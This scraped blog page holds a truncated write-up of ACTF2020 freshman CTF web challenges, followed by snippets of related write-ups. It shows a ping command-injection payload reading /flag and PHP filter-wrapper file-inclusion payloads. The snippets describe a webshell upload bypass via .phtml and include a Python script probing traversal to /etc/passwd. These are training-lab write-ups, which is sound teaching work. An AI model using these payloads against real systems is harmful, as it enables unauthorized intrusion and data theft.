[ACTF2020 新生赛]Web汇总

最新推荐文章于 2025-06-02 12:11:45 发布

brainw

最新推荐文章于 2025-06-02 12:11:45 发布

阅读量1.2k

点赞数 2

CC 4.0 BY-SA版权

分类专栏： CTF 文章标签：安全 web

本文链接：https://blog.csdn.net/brainw/article/details/105662126

[ACTF2020 新生赛]Web汇总

Exec

ping命令注入

‘127.0.0.1;’’

没有回显

截断符号配合普通命令

发现没有任何屏蔽

payload：

127.0.0.1;cat /flag

拓展：https://blog.csdn.net/qq_41079177/article/details/88321816

Include

根据题目和询问可能是本地文件包含

通过

php://filter/read=convert.base64-encode/resource=

查看flag.php源码

?file=php://filter/read=convert.base64encode/resource=index.php

得到index.php的base64源码转换

<meta charset="utf8">
<?php
error_reporting(0);
$file =
$_GET["file"];<

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

brainw

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

[ACTF2020 新生赛]Include1

weixin_64160292的博客

03-31

5758

题目：[ACTF2020 新生赛]Include1 题目来源：buuctf 过程分析： 1、首先看到一个tips，我们打开看看然后从题目我们知道这个是一个文件包含题，对文件进行php伪协议检测伪协议 php：//input：用来接收POST数据。我们能够通过input把我们的语句输入上去然后执行。条件： php <5.0 ，allow_url_include=Off 情况下也可以用 php > 5.0，只有在allow_url_fope

[ACTF2020 新生赛]Include

qq_42404383的博客

08-11

4426

文章目录[ACTF2020 新生赛]Include题目：分析：验证：解题：资料： [ACTF2020 新生赛]Include 题目：分析：用bp抓包，无其他猫腻查看响应头得到 ==> php7.3.13 url ?file=flag.php 验证：考察利用php://filter伪协议进行文件包含构造payload = http://5165ec02-c72d-4737-85c5-295e639ea759.node3.buuoj.cn/?file=php://filter/read

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF[ACTF2020 新生赛]Exec 1题解

最新发布

2301_79896143的博客

06-02

550

摘要：本文分析了BUUCTF[ACTF2020 新生赛]Exec题目，发现存在命令注入漏洞。通过输入127.0.0.1;ls测试命令执行功能后，逐步尝试目录遍历，最终用cat ../../../../../../flag成功获取flag{bda3a63d-74e3-4e9f-8dab-c5c6ea0c1bd9}。该题未对用户输入进行过滤，属于较基础的命令注入漏洞利用。

ACTF2020 新生赛 -- WP

会下雪的晴天

05-18

3276

做题思路记录，同时感谢赵师傅和Y1NG的环境与源码文章目录[ACTF2020 新生赛]Include[ACTF2020 新生赛]Exec[ACTF2020 新生赛]BackupFile[ACTF2020 新生赛]Upload [ACTF2020 新生赛]Include 主页显示是一个链接，点进去看看，URL出现file=，结合题目判断为文件包含用伪协议读flag.php，一般语句为php://filter/read=convert.base64-encode/resource=xxx php:/.

[ACTF新生赛2020]剑龙

cuihua的博客

03-31

1749

32.[ACTF新生赛2020]剑龙 1.题目概述 2.解题过程直接解压www.zip，出了一个o_o文件，O_O是pyc文件，题目名称叫剑龙 pyc文件借一段话，转自一文让你完全弄懂Stegosaurus - Angel_Kitty - 博客园 (cnblogs.com) 简单来说， pyc 文件就是 Python 的字节码文件，是个二进制文件。我们都知道 Python 是一种全平台的解释性语言，全平台其实就是 Python 文件在经过解释器解释之后(或者称为编译)生成的 pyc 文件可以在多

[ACTF2020 新生赛] Exec

Sweet_vinegar520的博客

10-28

805

本题可以直接去翻找文件目录，毕竟包含 flag 的文件不一定每次都直接叫做 flag。此处其实。

BUUCTF-Web-[ACTF2020新生赛]Upload

m0_61851859的博客

03-27

637

4.打开burpsuite进行抓包，修改为php文件类型并将数据包发送回去，发现上传失败。5. 考虑是不是网站对php后缀进行过滤，采取黑名单绕过修改文件后缀为.phtml，上传成功。3.将文件后缀名修改为.jpg类型上传文件，上传成功。（但此时文件有错木马无法连接）1.打开题目在小灯泡那发现了文件上传，因此猜测存在文件上传漏洞。2.尝试上传一句话木马，上传失败仅允许上传弹窗提示的文件类型。7.连接成功并找到flag。6.使用蚁剑进行连接。

[ACTF2020 新生赛]Upload

2301_80156923的博客

12-17

480

尝试修改后缀为：php1,php2, php3, php4, php5, phps, pht, phtm, phtml。说明只能上传jpg，png，gif等后缀的文件，那接下来我们就抓包修改数据包信息，尝试修改文件的类型。经过尝试最后发现后缀改为phtml 文件能够被解析。然后用蚁剑连接，打开终端查看就可以获得flag。鼠标移到灯泡上显示可以上传文件。该题可在BUUCTF里找到。先上传一个php文件试试。

BUUCTF-Web- [ACTF2020 新生赛]Upload

weixin_67813445的博客

03-14

298

本题考察文件上传前端校验以及.phtml的用法

BUUCTF-Web:[ACTF2020 新生赛]Upload

m0_56161093的博客

05-30

1300

题目解题过程 1、上传文件从网页上来看，可以上传文件，我们尝试上传一个PHP一句话木马。结果如下：提示我们只能上传图片类型的文件，尝试用burpsuite抓包，发现同样有弹窗，但没有抓到数据。所以这里猜测这里是前端JS进行校验的 2、绕过前端校验方法一禁用一下 js 再提交，就可以绕过了方法二修改PHP后缀为图片的后缀然后上传，再重新抓包修改后缀修改前：修改后：上传结果如下：可以看到上传失败，应该是服务器端对上传的文件进行了校验。 3、绕过上传黑名单常规PHP文件后缀

[ACTF2020 新生赛]Exec 1

qq_43618536的博客

07-01

990

BUUCTF的[ACTF2020 新生赛]Exec 1

[ACTF2020 新生赛]BackupFile

SopRomeo的博客

02-29

5277

根据提示，是备份文件泄露备份文件参考泄露文献 .rar .zip .7z .tar.gz .bak .swp .txt .html 以上是备份文件后缀，我试了下www.zip不行，应该是别的，于是用dirsearch扫描目录看到bar的后缀，下载源码代码审计简单的弱类型绕过 php中两个等于号是弱等于，GET请求传参即可得到flag ...

[ACTF2020 新生赛]Upload--BUUCTF

XiaoYeZhu_1314的博客

04-24

900

得到：Upload Success!第二步：使用bp抓上传jpg文件的包，在修改文件后缀名为phtml。第一步：上传php文件，他提示，只能上传jpg、png、gif。第四步：拼接访问，连接蚁剑，找到flag。第三步：进行放过，在访问浏览器。

[ACTF新生赛2020]Splendid_MineCraft

2302_79135465的博客

05-29

382

v3 取最左边字符ACTF{xxxx ，v17是从第六个字符开始取四个字符，v18是从第十字符开始取两个字符，得到 ACTF{xxx_xxx_xxx} ，flag 26位。发现这是一个循环，循环次数151h，[esi+edi+1Fh]内容和72h异或。把输入给cl，cl又赋给bl，ecx=edi(循环次数 i ) + 0x83 ,然后就是ebx^ecx结果存到ebx。好像就是 bl=data[ flag[i]^(0x83+i) ] 这个，把 data 找到就差不多了。进入call dword。

[ACTF2020 新生赛]Exec

weixin_51019270的博客

01-24

121

[ACTF2020 新生赛]Exec WP 一：Exec 这个题，直接ping ip就可以得到flag… 先上payload 127.0.0.1; cat/flag 但…这好像有点太过简单了。去查了半天相关知识点。又总结了一部分。二：常见管道符 1、’|’ 按位或，直接执行|后面的语句 2、|| 逻辑或，前面是错的就执行后面的语句，否则就只执行前面的语句。 3、& 按位与，前后命令都执行，不论前面对错 4、&& 逻辑与，前面假就都不执行，前面真就执行两条。但是这个在这一

buuctf [ACTF新生赛2020]easyre

shdbehdvd的博客

08-01

746

新手上路学习过程。

buuctf web [ACTF2020 新生赛]Include 1

01-15

### 关于 BUUCTF ACTF2020 新生赛 Web Include 题目分析 #### 背景介绍该题目属于Web安全领域中的文件包含漏洞利用。通过特定的URL参数绕过服务器端的安全检查，最终读取到目标文件的内容。 #### 技术细节解析在本题中，攻击者可以控制`file`参数来指定要加载的文件路径。由于存在两层URL编码机制，使得原本受限的字符能够成功传递给PHP解释器处理： - `%253F`经过第一次解码变为`%3F` - 经第二次解码后成为问号(`?`)，这有助于规避某些基于字符串匹配方式实现的简单防护措施[^1] 因此，当访问如下链接时： ``` http://url.to.target/?file=hint.php%253F/../../../../ffffllllaaaagggg ``` 实际上是在尝试从根目录向上回溯多个层级并请求名为`ffffllllaaaagggg`的目标文件。这种技巧常用于测试是否存在本地文件包含(Local File Inclusion, LFI)漏洞以及评估其严重程度。 #### 实际操作建议为了验证上述理论，在实验环境中应当谨慎构建类似的payload，并确保只针对授权范围内的资源进行探索。同时注意观察返回的数据流特征变化情况，比如页面布局结构调整或是新增加了异常提示信息等现象。 ```python import requests target_url = "http://example.com/index.php" payload = "?file=hint.php%253F/../../../../etc/passwd" response = requests.get(target_url + payload) if b'root:x:' in response.content: print("[+] Potential Local File Inclusion vulnerability detected.") else: print("[-] No obvious signs of a vulnerable condition found.") ```